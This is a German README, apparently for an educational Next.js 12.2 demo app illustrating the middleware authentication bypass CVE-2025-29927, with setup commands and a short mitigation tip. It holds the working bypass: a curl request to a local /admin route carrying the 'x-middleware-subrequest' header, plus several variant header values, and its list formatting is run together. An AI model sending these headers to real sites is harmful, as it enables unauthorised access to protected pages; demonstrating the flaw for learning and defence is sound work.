
🔓 Next.js Auth Bypass Demo - Lernanwendung, die die Middleware-Authentifizierungs-Bypass-Sicherheitslücke CVE-2025-29927 demonstriert. ⚠️ Nur für Bildungszwecke.[Made using Ai]
Eine einfache Proof-of-Concept-Anwendung mit Next.js 12.2.
npm install
npm run dev
Die Anwendung ist unter http://localhost:3000 verfügbar.
npm run dev – Entwicklungsserver startennpm run build – Für Produktion erstellennpm run start – Produktionsserver startenBearbeite pages/index.js, um die Hello-World-Seite anzupassen. Die Anwendung verwendet der Einfachheit halber Inline-Stile, du kannst aber nach Bedarf CSS-Dateien oder Styling-Bibliotheken hinzufügen.
Diese Anwendung demonstriert die CVE-2025-29927-Sicherheitslücke, entdeckt von Rachid.A (zhero) und Yasser Allam (inzo_):
x-middleware-subrequest-Headeradminadminx-middleware-subrequest: middleware-Header hinzufügencurl -H "x-middleware-subrequest: middleware" http://localhost:3000/adminx-middleware-subrequest: middlewarex-middleware-subrequest: src/middlewarex-middleware-subrequest: middleware:middleware:middleware:middleware:middlewarex-middleware-subrequest-Header auf Proxy/CDN-Ebene blockieren⚠️ WARNUNG: Dies demonstriert eine echte CVE nur zu Bildungszwecken!
Diese Anwendung verwendet der Einfachheit halber Inline-Stile. Für eine Produktions-App solltest du Folgendes in Betracht ziehen:
Viel Spaß beim Programmieren! 🚀